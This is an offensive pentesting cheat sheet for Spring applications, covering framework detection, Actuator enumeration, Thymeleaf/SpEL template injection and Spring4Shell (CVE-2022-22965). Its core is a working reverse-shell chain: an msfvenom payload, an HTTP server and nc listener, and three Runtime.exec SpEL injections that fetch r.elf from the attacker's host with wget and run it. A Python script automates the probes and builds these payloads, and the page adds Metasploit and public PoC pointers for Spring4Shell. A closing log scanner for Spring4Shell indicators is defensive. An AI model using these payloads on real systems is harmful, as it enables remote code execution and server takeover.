# Spring Pentesting

Spring is an application framework and inversion of control container for the Java platform.

### Framework Detection <a href="#framework-detection" id="framework-detection"></a>

If requests for unknown paths return the **Whitelabel Error Page** (the body reads "This application has no explicit mapping for /error, so you are seeing this as a fallback."), the site is almost certainly running **Spring Boot**: that page is Spring Boot's default error view. API-style endpoints give the same signal as a JSON error body with `timestamp`, `status`, `error` and `path` fields.

### Enumeration <a href="#enumeration" id="enumeration"></a>

#### Directory Discovery <a href="#directory-discovery" id="directory-discovery"></a>

The SecLists Spring Boot wordlist includes Actuator endpoints (`/actuator`, `/actuator/env`, `/actuator/heapdump`, ...); an exposed `/actuator/env` or `/actuator/heapdump` can leak credentials and session data, so check anything it finds.

```
ffuf -u https://example.com/FUZZ -w seclists/Discovery/Web-Content/spring-boot.txt
```

### SSTI <a href="#ssti" id="ssti"></a>

#### Discovery <a href="#discovery" id="discovery"></a>

If user input is reflected in the rendered page, whether from an input field such as a search form or from a URL parameter, test it for server-side template injection (SSTI). Spring applications commonly render with Thymeleaf, whose expressions (`#{...}`, `*{...}`) are evaluated through SpEL, so probe each syntax separately.

Try these:

```
2*2
#{2*2}
*{2*2}
```

A `4` in the response is only a weak signal, since that number may appear elsewhere on the page. Confirm with a method call, which only an evaluating engine can turn into the expected string:

```
{"dfd".replace("d", "x")}
#{"dfd".replace("d", "x")}
*{"dfd".replace("d", "x")}

// ---------------------------------------

// the desired output of the above...
"xfx"
```

#### Reverse Shell <a href="#reverse-shell" id="reverse-shell"></a>

First generate the reverse-shell payload that the target will download from your machine:

```
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f elf > r.elf
```

Serve it over HTTP so the target can fetch `r.elf`:

```
python3 -m http.server 8000
```

In another terminal, start a listener for the incoming connection:

```
nc -lvnp <local-port>
```

Then inject the following into the vulnerable parameter, one payload per request, using whichever syntax (`*{...}` or `#{...}`) evaluated during discovery. `Runtime.exec(String)` splits the command on whitespace and does not go through a shell, so `&&`, `;`, pipes and redirects are not interpreted; that is why the download, the `chmod` and the execution are three separate payloads. If `wget` is not present on the target, `curl -o r.elf http://<local-ip>:8000/r.elf` is the usual substitute.

```
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget http://<local-ip>:8000/r.elf")}

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("./r.elf")}
```

The listener should then receive the shell. The HTTP response to the third request tells you nothing, since `exec` returns a `Process` without waiting for it, so watch `nc`.
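The discovery probes and the staged `Runtime.exec` payloads above can be scripted. The following is an added example written for this page (not code from the original page or from Spring): it runs the probes against a parameter, reports which expression syntax evaluated, and builds the three staged payloads for that syntax. It generalizes the page's `2*2` probe to a product unlikely to occur on the page by chance. The target URL, parameter name and `demo_fetcher` (a constructed stand-in for a server that evaluates only `*{...}`) are assumptions so that it runs offline.

```python
"""SSTI probing and Runtime.exec payload staging for a Spring/Thymeleaf target.

Added example for this page; not code from the original page. The target URL
and parameter are placeholders, and demo_fetcher is a constructed stand-in for
a server that evaluates *{...} expressions, so the script runs offline.
"""
import html
import re
import urllib.parse
import urllib.request


def arithmetic_probes(a=7391, b=7):
    """Arithmetic probes in the three syntaxes the page tests. A product that
    is unlikely to appear on the page by chance (unlike 2*2 -> 4) avoids false
    positives from unrelated numbers in the response."""
    expr = f"{a}*{b}"
    expected = str(a * b)
    return [(expr, expected), ("#{" + expr + "}", expected), ("*{" + expr + "}", expected)]


def method_probes():
    """Method-call probes: a hit here proves expression evaluation, not just
    arithmetic folding, which is what the Runtime.exec payloads rely on."""
    expr = '"dfd".replace("d", "x")'
    return [("{" + expr + "}", "xfx"), ("#{" + expr + "}", "xfx"), ("*{" + expr + "}", "xfx")]


def evaluated(probe, expected, body):
    """True when the engine evaluated the probe: the expected result is present
    and the probe text itself is not echoed back verbatim (plain reflection)."""
    text = html.unescape(body)
    return expected in text and probe not in text


def fetch(url, param, value):
    """Send one probe as a GET parameter and return the response body."""
    query = urllib.parse.urlencode({param: value})
    sep = "&" if "?" in url else "?"
    with urllib.request.urlopen(url + sep + query, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def run_probes(url, param, fetcher=fetch):
    """Return the probes that the target evaluated."""
    hits = []
    for probe, expected in arithmetic_probes() + method_probes():
        if evaluated(probe, expected, fetcher(url, param, probe)):
            hits.append(probe)
    return hits


def prefix_from_probe(probe):
    """Which expression syntax worked: '*', '#' or '' for bare braces."""
    return probe[0] if probe[0] in "*#" else ""


def runtime_exec_payload(cmd, prefix="*"):
    """Wrap one command in the Runtime.exec expression from the page.
    Runtime.exec(String) splits on whitespace and does not go through a shell:
    pipes, redirects and quoting are not interpreted, so one command per payload."""
    if '"' in cmd:
        raise ValueError("double quotes would break the SpEL string literal")
    return prefix + '{"".getClass().forName("java.lang.Runtime").getRuntime().exec("' + cmd + '")}'


def staged_reverse_shell(lhost, lport=8000, prefix="*", filename="r.elf"):
    """The page's three-step staging (download, make executable, run) as
    separate payloads, because exec() cannot chain them with && or ;."""
    commands = [
        f"wget http://{lhost}:{lport}/{filename}",
        f"chmod +x ./{filename}",  # the execute bit is all that is needed
        f"./{filename}",
    ]
    return [runtime_exec_payload(c, prefix) for c in commands]


def demo_fetcher(url, param, value):
    """Constructed stand-in for a target that evaluates only *{...} and
    reflects everything else verbatim (HTML-escaped)."""
    if value.startswith("*{") and value.endswith("}"):
        inner = value[2:-1]
        if inner == '"dfd".replace("d", "x")':
            return "<p>xfx</p>"
        m = re.fullmatch(r"(\d+)\*(\d+)", inner)
        if m:
            return f"<p>{int(m[1]) * int(m[2])}</p>"
    return f"<p>{html.escape(value)}</p>"


if __name__ == "__main__":
    hits = run_probes("http://target.example/search", "q", demo_fetcher)
    print("evaluated probes:", hits)
    if hits:
        for payload in staged_reverse_shell("10.0.0.5", 8000, prefix_from_probe(hits[-1])):
            print(payload)
```

Against a real target, pass `fetch` (the default) instead of `demo_fetcher` and send each staged payload as a separate request, exactly as in the manual steps above; the script only builds the strings, it does not URL-encode or send them.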

### Spring4Shell (CVE-2022-22965) <a href="#spring4shell-cve-2022-22965" id="spring4shell-cve-2022-22965"></a>

**Spring4Shell** is a remote code execution vulnerability in the **Spring** Framework's data binding, part of **Spring Core**, the heart of the framework. It is a bypass of the fix for **CVE-2010-1622**: on JDK 9 and later the property path `class.module.classLoader` slips past the older block on `class.classLoader`, so request parameters can reach the servlet container's class loader.\
Affected versions are Spring Framework 5.3.0 to 5.3.17 and 5.2.0 to 5.2.19 (fixed in 5.3.18 and 5.2.20; Spring Boot 2.6.6 and 2.5.12). The public exploit chain requires JDK 9+, Apache Tomcat, and the application deployed as a WAR; it abuses Tomcat's AccessLogValve to write a JSP webshell into the webroot. Treat those as the preconditions of the known exploit, not of the bug: an unpatched version on a different stack is still vulnerable.

#### Exploitation <a href="#exploitation" id="exploitation"></a>

**Metasploit** has a module for it:

```
msfconsole
msf> use exploit/multi/http/spring_framework_rce_spring4shell
```

Alternatively, several public PoCs exist on **GitHub**. They, like the Metasploit module, leave a JSP webshell in the Tomcat webroot, so note its path and remove it when the engagement ends.

* <https://github.com/BobTheShoplifter/Spring4Shell-POC>
* <https://github.com/Leovalcante/spring4shell>
* <https://github.com/me2nuk/CVE-2022-22965>
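For the check on the other side of the engagement, the following is an added example (not code from the page or from any of the PoCs linked above) that flags Spring4Shell exploitation attempts in a Tomcat or Apache combined-format access log. It looks for the `class.module.classLoader` property path the exploit chain binds to, after undoing URL encoding, and then flags any `.jsp` request from the same address as the likely use of a written webshell. The log lines, the attacker address and the webshell name are constructed for the demo.

```python
"""Flag Spring4Shell (CVE-2022-22965) exploitation attempts in access logs.

Added example for this page, not code from the page or any project. Works on
Tomcat/Apache combined-format lines; SAMPLE_LOG is constructed, with the
attacker address and the webshell name chosen for the demo.
"""
import re
import urllib.parse

# Combined log format: host ident user [time] "request-line" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# The public exploit chain binds request parameters onto
# class.module.classLoader.* to reach Tomcat's AccessLogValve and drop a JSP;
# a legitimate application never binds that property path.
INDICATOR = re.compile(r"class\.module\.classloader", re.IGNORECASE)


def decode_target(target):
    """Undo URL encoding twice so class%2Emodule... and double-encoded
    variants are seen as the attacker meant them."""
    for _ in range(2):
        target = urllib.parse.unquote_plus(target)
    return target


def scan(lines):
    """Return (ip, reason, decoded request target) for each suspicious line.
    After a binding attempt from an address, any request for a .jsp from the
    same address is flagged too, since that is how the written shell is used."""
    alerts = []
    suspects = set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_target(m["target"])
        path = decoded.split("?", 1)[0].lower()
        if INDICATOR.search(decoded):
            alerts.append((m["ip"], "class.module.classLoader binding in request", decoded))
            suspects.add(m["ip"])
        elif m["ip"] in suspects and path.endswith(".jsp"):
            alerts.append((m["ip"], "JSP requested after binding attempt", decoded))
    return alerts


def scan_text(text):
    """Convenience wrapper for a whole log file read into a string."""
    return scan(text.splitlines())


# Constructed sample: two binding attempts (one URL-encoded), the follow-up
# webshell request, a benign request with a parameter merely named "class",
# and a POST whose body (where the exploit usually sends its parameters) is
# not in the access log at all.
SAMPLE_LOG = """\
10.0.0.7 - - [31/Mar/2022:10:14:02 +0000] "GET /app/?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1" 200 512
10.0.0.7 - - [31/Mar/2022:10:14:05 +0000] "GET /app/?class%2Emodule%2EclassLoader%2Eresources%2Econtext%2Eparent%2Epipeline%2Efirst%2Edirectory=webapps/ROOT HTTP/1.1" 200 512
10.0.0.7 - - [31/Mar/2022:10:14:09 +0000] "GET /shell.jsp?cmd=id HTTP/1.1" 200 40
192.168.1.20 - - [31/Mar/2022:10:15:00 +0000] "GET /app/?name=alice&class=gold HTTP/1.1" 200 1043
192.168.1.20 - - [31/Mar/2022:10:15:01 +0000] "POST /app/ HTTP/1.1" 200 1043
"""

if __name__ == "__main__":
    for ip, reason, target in scan_text(SAMPLE_LOG):
        print(f"{ip}: {reason}: {target}")
```

The last sample line is the caveat: the exploit normally sends its parameters in a POST body, which the access log does not record, so this catches GET variants and the follow-up webshell traffic only. Pair it with request-body logging or a WAF rule on the same indicator, and with a check for unexpected `.jsp` files under Tomcat's `webapps` directories.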

### References <a href="#references" id="references"></a>

* [TryHackMe](https://tryhackme.com/room/spring4shell)
